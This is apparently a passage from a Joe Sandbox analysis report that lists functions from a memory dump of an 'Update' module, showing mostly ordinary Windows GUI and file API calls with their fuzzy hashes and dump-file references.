                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: State
                                              • String ID:
                                              • API String ID: 1649606143-0
                                              • Opcode ID: 7772e9a356a5b02cbd75942f111375013274ce695db1bc2487f9c4e7767dec77
                                              • Instruction ID: 73b83f8e2d97b1bf2d06d151e25274db1a481740a72feb6ecdda398ef000b1f5
                                              • Opcode Fuzzy Hash: 7772e9a356a5b02cbd75942f111375013274ce695db1bc2487f9c4e7767dec77
                                              • Instruction Fuzzy Hash: A4F0653435528D8FFB01BBA08808F9B77F99B0BF45FA48174EF4596461EBB095A0D714
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: IconicVisibleWindow
                                              • String ID:
                                              • API String ID: 1797901696-0
                                              • Opcode ID: 75a3920bce9d2b911281ee01e8399df7c38727ab989961f6ead547950c05870d
                                              • Instruction ID: 948c4fb4deae88b03fe752ca056bd540f0a370e1927fb5567db4fa28adf29a89
                                              • Opcode Fuzzy Hash: 75a3920bce9d2b911281ee01e8399df7c38727ab989961f6ead547950c05870d
                                              • Instruction Fuzzy Hash: 71F0E9333250206BD905253D9C106BEBB6D9F9B7347160326FA62D2AE09BD0681116D0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: IconicVisibleWindow
                                              • String ID:
                                              • API String ID: 1797901696-0
                                              • Opcode ID: fdac2e9c4d777adc0ca7fa4eff1d5945492cfe52f17daa558d0f2002f3d4a3b4
                                              • Instruction ID: adc2c5e0c867d49da4d77ce8152315258a53bccaaf3e082478e16132c5c27c25
                                              • Opcode Fuzzy Hash: fdac2e9c4d777adc0ca7fa4eff1d5945492cfe52f17daa558d0f2002f3d4a3b4
                                              • Instruction Fuzzy Hash: 2FE08C31311611DFDA051F29D808AADBB79BF8A641305012AE90AC3620EBA0E8118B80
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1E8E09
                                                • Part of subcall function 6C1C9B7C: __EH_prolog3.LIBCMT ref: 6C1C9B83
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 6C1E8E81
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 6C1E8EB4
                                              • CopyRect.USER32(?,?), ref: 6C1E8EDB
                                              • GetObjectW.GDI32(?,00000018,?), ref: 6C1E8F08
                                              • GetSystemMetrics.USER32(00000032), ref: 6C1E8F25
                                              • GetSystemMetrics.USER32(00000031), ref: 6C1E8F30
                                              • GetSysColor.USER32(00000004), ref: 6C1E8F70
                                              • CreateCompatibleDC.GDI32(00000000), ref: 6C1E8F8A
                                              • CopyRect.USER32(?,?), ref: 6C1E8FDE
                                              • GetSysColor.USER32(0000000D), ref: 6C1E8FEF
                                              • GetSysColor.USER32(00000010), ref: 6C1E900F
                                              • GetSysColor.USER32(00000014), ref: 6C1E9019
                                              • GetSysColor.USER32(0000000D), ref: 6C1E904F
                                              • GetSysColor.USER32(00000007), ref: 6C1E91C4
                                              • ExtTextOutW.GDI32(00000001,?,?,00000002,00000000,?,?,00000000), ref: 6C1E9209
                                              • CreateCompatibleDC.GDI32(00000000), ref: 6C1E926E
                                              • InflateRect.USER32(00000000,000000FF,000000FF), ref: 6C1E9297
                                              • BitBlt.GDI32(00000003,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 6C1E92B6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Color$Rect$CompatibleCopyCreateInfoItemMenuMetricsSystem$H_prolog3H_prolog3_InflateObjectText
                                              • String ID: @
                                              • API String ID: 364174344-2766056989
                                              • Opcode ID: 32f1097b99d0d01b580bbb3c163c835fd69a235aa0a3e8f768ac5161667bf99c
                                              • Instruction ID: 4b6f0b8f398321b2598de8b8312440ef8cf27b21fadb0b10adf2d83e35e65a07
                                              • Opcode Fuzzy Hash: 32f1097b99d0d01b580bbb3c163c835fd69a235aa0a3e8f768ac5161667bf99c
                                              • Instruction Fuzzy Hash: B7F15671A016189FDF04DFA8CC98BEDBBB9BF4A314F144159E906AB290CB74AD45CF50
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C24CAC1
                                              • CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 6C24CAF7
                                                • Part of subcall function 6C24E0A4: __EH_prolog3_GS.LIBCMT ref: 6C24E0AE
                                                • Part of subcall function 6C24E0A4: GetObjectW.GDI32(?,00000018,?), ref: 6C24E0D3
                                                • Part of subcall function 6C24E0A4: GetObjectW.GDI32(?,00000054,?), ref: 6C24E118
                                              • GetObjectW.GDI32(?,00000018,?), ref: 6C24CB31
                                              • DeleteObject.GDI32(?), ref: 6C24CBB6
                                              • CreateCompatibleDC.GDI32(00000000), ref: 6C24CBE4
                                              • GetObjectW.GDI32(?,00000018,?), ref: 6C24CC00
                                              • GetObjectW.GDI32(?,00000018,?), ref: 6C24CC4A
                                              • SelectObject.GDI32(?,?), ref: 6C24CC6D
                                              • SelectObject.GDI32(?,?), ref: 6C24CCA4
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C24CCCA
                                              • SelectObject.GDI32(?,00000000), ref: 6C24CCE5
                                              • CreateCompatibleDC.GDI32(?), ref: 6C24CD15
                                              • SelectObject.GDI32(?,?), ref: 6C24CD33
                                              • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C24CD72
                                              • SelectObject.GDI32(?,?), ref: 6C24CD87
                                              • BitBlt.GDI32(?,?,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C24CDBD
                                              • SelectObject.GDI32(?,?), ref: 6C24CDCF
                                              • SelectObject.GDI32(?,00000000), ref: 6C24CDE0
                                              • DeleteObject.GDI32(?), ref: 6C24CDF1
                                              • DeleteObject.GDI32(?), ref: 6C24CE39
                                              • SelectObject.GDI32(?,?), ref: 6C24CE51
                                              • SelectObject.GDI32(?,00000000), ref: 6C24CE62
                                              • DeleteObject.GDI32(?), ref: 6C24CE6E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Object$Select$Delete$CompatibleCreate$H_prolog3_$BitmapCopyImage
                                              • String ID:
                                              • API String ID: 1780083495-0
                                              • Opcode ID: c8e1b9ee39a6dc5a6c2f2624f53a766c49307657937d2427dc4eee706e5c25b9
                                              • Instruction ID: d62e75f49e94bb7196d81eb6ffed86bbbcce987e329c3fd6ce2fa5ce76e71e4f
                                              • Opcode Fuzzy Hash: c8e1b9ee39a6dc5a6c2f2624f53a766c49307657937d2427dc4eee706e5c25b9
                                              • Instruction Fuzzy Hash: 23A14F70A02629EFEF259F65CC44BEDBBB8BF0A715F104194F91AA2650DB309E94CF50
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 6C210EF7
                                              • GetCurrentProcess.KERNEL32 ref: 6C210F02
                                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000002), ref: 6C210F15
                                              • GetLastError.KERNEL32 ref: 6C210F5F
                                              • SetFilePointer.KERNEL32(?,?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C210F8C
                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C210F9A
                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6C210FB9
                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C210FEA
                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C211004
                                              • GetFileSize.KERNEL32(?,?,00000000,?,?,?,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C211021
                                              • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C21102F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ErrorLast$File$CurrentProcess$DuplicateHandlePointerSize
                                              • String ID:
                                              • API String ID: 1051015183-0
                                              • Opcode ID: a6a11b4bcfb8eeb64a8a0eb32c629387f981390f1c18ff46a53085b03f6091da
                                              • Instruction ID: edd5145570d7e89094014e50d736e8b82ffb582ed41d957c3cc07c91fb16e237
                                              • Opcode Fuzzy Hash: a6a11b4bcfb8eeb64a8a0eb32c629387f981390f1c18ff46a53085b03f6091da
                                              • Instruction Fuzzy Hash: E7918E71605219BFDF149FA5CC08EDABBBCEF06265F108629FD1697A40DB70D910DBA0
                                              APIs
                                                • Part of subcall function 6C1E4E48: GetWindowLongW.USER32(?,000000F0), ref: 6C1E4E55
                                              • GetParent.USER32(6C1DA23E), ref: 6C1D5018
                                              • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C1D503A
                                              • GetWindowRect.USER32(6C1DA23E,?), ref: 6C1D505E
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 6C1D507E
                                              • MonitorFromWindow.USER32(00000000,00000001), ref: 6C1D50B7
                                              • GetMonitorInfoW.USER32(00000000), ref: 6C1D50BE
                                              • CopyRect.USER32(?,?), ref: 6C1D50CC
                                              • GetWindowRect.USER32(00000000,?), ref: 6C1D50D9
                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 6C1D50E6
                                              • GetMonitorInfoW.USER32(00000000), ref: 6C1D50ED
                                              • CopyRect.USER32(?,?), ref: 6C1D50FB
                                              • GetParent.USER32(6C1DA23E), ref: 6C1D5105
                                              • GetClientRect.USER32(00000000,?), ref: 6C1D5112
                                              • GetClientRect.USER32(00000000,?), ref: 6C1D511D
                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 6C1D512B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
                                              • String ID: (
                                              • API String ID: 3610148278-3887548279
                                              • Opcode ID: ff089c34b6c99390d8396bb70a3aa0a2e15d953ebbe96dca7e7c88cc935c97c0
                                              • Instruction ID: 8ed9b909a0937d78745249027ee780dbb34a9671b32a1cc8cdb40fdc7c051975
                                              • Opcode Fuzzy Hash: ff089c34b6c99390d8396bb70a3aa0a2e15d953ebbe96dca7e7c88cc935c97c0
                                              • Instruction Fuzzy Hash: DC614E72A016199FDF01CFA8C988BEEB7B9FF4A305F254215E516BB240DB70E945CB60
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: UpdateWindow$MessageParent$BeepClientFocusH_prolog3_ScreenSend
                                              • String ID: T}4l
                                              • API String ID: 841119998-3324797550
                                              • Opcode ID: d0a44ceb4251134f9dfc2d03bba8476f5896966f5b2fdf96ef7d6e917c828f24
                                              • Instruction ID: e02da4d6ba4545edfa7b699331166c289e4742d16a01d8d7ef938544af3fda23
                                              • Opcode Fuzzy Hash: d0a44ceb4251134f9dfc2d03bba8476f5896966f5b2fdf96ef7d6e917c828f24
                                              • Instruction Fuzzy Hash: F1C1A071B0161ADBCF159F64C888BAD7BB9BF4A319F15026AFC26A7790DB309811CF50
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C2B892D
                                              • GetCursorPos.USER32(?), ref: 6C2B89E6
                                              • IsRectEmpty.USER32(?), ref: 6C2B8A1A
                                              • IsRectEmpty.USER32(?), ref: 6C2B8A41
                                              • IsRectEmpty.USER32(?), ref: 6C2B8A63
                                              • GetWindowRect.USER32(?,?), ref: 6C2B8A91
                                              • GetWindowRect.USER32(?,?), ref: 6C2B8AC1
                                              • PtInRect.USER32(?,?,?), ref: 6C2B8B0E
                                              • OffsetRect.USER32(?,?,00000000), ref: 6C2B8B26
                                                • Part of subcall function 6C2B9F12: __EH_prolog3.LIBCMT ref: 6C2B9F19
                                                • Part of subcall function 6C2B9F12: SetRectEmpty.USER32 ref: 6C2BA019
                                                • Part of subcall function 6C2B9F12: SetRectEmpty.USER32(?), ref: 6C2BA020
                                              • SetRectEmpty.USER32(?), ref: 6C2B8B49
                                              • OffsetRect.USER32(?,?,?), ref: 6C2B8CDA
                                              • IsRectEmpty.USER32(?), ref: 6C2B8CFA
                                              • IsRectEmpty.USER32(?), ref: 6C2B8D2D
                                              • PtInRect.USER32(?,00000000,00000000), ref: 6C2B8D41
                                              • OffsetRect.USER32(?,?,?), ref: 6C2B8D6D
                                              • IsRectEmpty.USER32(?), ref: 6C2B8D8C
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3_
                                              • String ID:
                                              • API String ID: 359163869-0
                                              • Opcode ID: 5849c51170942331908c6230e4ccef2717fc91969512d23c5f87a3d46ff419cb
                                              • Instruction ID: f99b4ee27d05560231be07aede1868bd85ccaebf372d1a125a74d3ad7b63e41f
                                              • Opcode Fuzzy Hash: 5849c51170942331908c6230e4ccef2717fc91969512d23c5f87a3d46ff419cb
                                              • Instruction Fuzzy Hash: EEE1BE76A0160ADFDF05CFA4C884AAEBBB9FF49349F14415AED09AB645DB30E841CB40
                                              APIs
                                              • GetDlgCtrlID.USER32(?), ref: 6C1DCC4B
                                              • GetDlgItem.USER32(?,?), ref: 6C1DCD08
                                              • ShowWindow.USER32(00000000,00000000,?,?,?), ref: 6C1DCD16
                                              • GetMenu.USER32(?), ref: 6C1DCD28
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 6C1DCD44
                                              • GetDlgItem.USER32(?,0000E900), ref: 6C1DCD90
                                              • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 6C1DCDA4
                                              • GetDlgItem.USER32(?,0000EA21), ref: 6C1DCDC0
                                              • GetDlgItem.USER32(?,0000E900), ref: 6C1DCDD6
                                              • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 6C1DCDE8
                                              • SetWindowLongW.USER32(?,000000F4,0000E900), ref: 6C1DCDF4
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 6C1DCE07
                                              • SetMenu.USER32(?,00000000), ref: 6C1DCE1E
                                              • GetDlgItem.USER32(?,?), ref: 6C1DCE7B
                                              • ShowWindow.USER32(?,00000005), ref: 6C1DCE89
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ItemWindow$Long$InvalidateMenuRectShow$Ctrl
                                              • String ID:
                                              • API String ID: 599340499-0
                                              • Opcode ID: 74b10f1650a960d3e39d4f5c33323841adea9982b2ab7110fe704520e37f92a1
                                              • Instruction ID: 84d07ce01429049a9c6bbdd1e913d8b0bc8daa85e3c1e51832b3e94354050f94
                                              • Opcode Fuzzy Hash: 74b10f1650a960d3e39d4f5c33323841adea9982b2ab7110fe704520e37f92a1
                                              • Instruction Fuzzy Hash: 54918D34B01616EFDF04DF68C898BADBBB5FF0A315F110565E916AB690DB70A910CF90
                                              APIs
                                              • IsRectEmpty.USER32(?), ref: 6C1E2B13
                                              • GetClientRect.USER32(?,?), ref: 6C1E2B5E
                                              • BeginDeferWindowPos.USER32(?), ref: 6C1E2B89
                                              • GetWindowRect.USER32(?,?), ref: 6C1E2C6F
                                              • OffsetRect.USER32(?,?,00000000), ref: 6C1E2CA6
                                              • OffsetRect.USER32(?,?,00000000), ref: 6C1E2CDC
                                              • OffsetRect.USER32(?,00000002,00000000), ref: 6C1E2D06
                                              • EqualRect.USER32(?,?), ref: 6C1E2D14
                                              • OffsetRect.USER32(?,00000000,?), ref: 6C1E2DE1
                                              • OffsetRect.USER32(?,00000000,00000002), ref: 6C1E2E19
                                              • OffsetRect.USER32(?,00000000,00000002), ref: 6C1E2E3F
                                              • EqualRect.USER32(?,?), ref: 6C1E2E76
                                              • EndDeferWindowPos.USER32(00000000), ref: 6C1E2F8C
                                              • SetRectEmpty.USER32(?), ref: 6C1E2F9D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                              • String ID:
                                              • API String ID: 3160784657-0
                                              • Opcode ID: fba9aaf5f0b3383aa76904d9f2895f51f199ad163a3690c45cea36633273f03c
                                              • Instruction ID: db641b9b3179c8fc7a2f4d27f0a1a3d22ffb9c4b53a2ce14a56575ef4b3effc1
                                              • Opcode Fuzzy Hash: fba9aaf5f0b3383aa76904d9f2895f51f199ad163a3690c45cea36633273f03c
                                              • Instruction Fuzzy Hash: 2F021971A0161ACFDF04CFA8C998BADBBB9BF49308F244169E806EB251D770A945CF50
                                              APIs
                                              • GetCapture.USER32 ref: 6C23A639
                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6C23A65D
                                              • IsWindow.USER32(?), ref: 6C23A6D0
                                              • IsWindow.USER32(?), ref: 6C23A75E
                                              • ClientToScreen.USER32(?,?), ref: 6C23A776
                                              • ClientToScreen.USER32(?,?), ref: 6C23A7A4
                                              • GetKeyState.USER32(00000011), ref: 6C23A7E8
                                              • GetKeyState.USER32(00000010), ref: 6C23A7F4
                                              • ImmGetContext.IMM32(?), ref: 6C23A801
                                              • ImmGetOpenStatus.IMM32(00000000,?), ref: 6C23A810
                                              • ImmReleaseContext.IMM32(?,00000000,?), ref: 6C23A835
                                              • GetFocus.USER32 ref: 6C23A867
                                              • IsWindow.USER32(?), ref: 6C23A8AB
                                              • IsWindow.USER32(?), ref: 6C23A909
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Window$ClientContextScreenState$CaptureFocusMessageOpenReleaseSendStatus
                                              • String ID:
                                              • API String ID: 1155058817-0
                                              • Opcode ID: 60e5ad75ef3e9996e314682c6944ea92ba113603d2fdaa8d22cde0124c542e68
                                              • Instruction ID: 5d3695588c76baa484ae2d1d9dc020c1d6d43ad8a234b5984eda2a99fff296c7
                                              • Opcode Fuzzy Hash: 60e5ad75ef3e9996e314682c6944ea92ba113603d2fdaa8d22cde0124c542e68
                                              • Instruction Fuzzy Hash: EFB1BDB1A0161BDBDF018FA5C948AAE7BB5BF45309F109139FC6A92D60EB35D902CB50
                                              APIs
                                              • FillRect.USER32(56010845,?,?), ref: 6C28085D
                                              • FillRect.USER32(?,?,?), ref: 6C2808C4
                                              • FillRect.USER32(?,?,?), ref: 6C280967
                                                • Part of subcall function 6C1CC5AB: __EH_prolog3.LIBCMT ref: 6C1CC5B2
                                                • Part of subcall function 6C1CC5AB: CreateSolidBrush.GDI32(6C1D8A6F), ref: 6C1CC5CD
                                              Strings
                                              Memory Dump Source
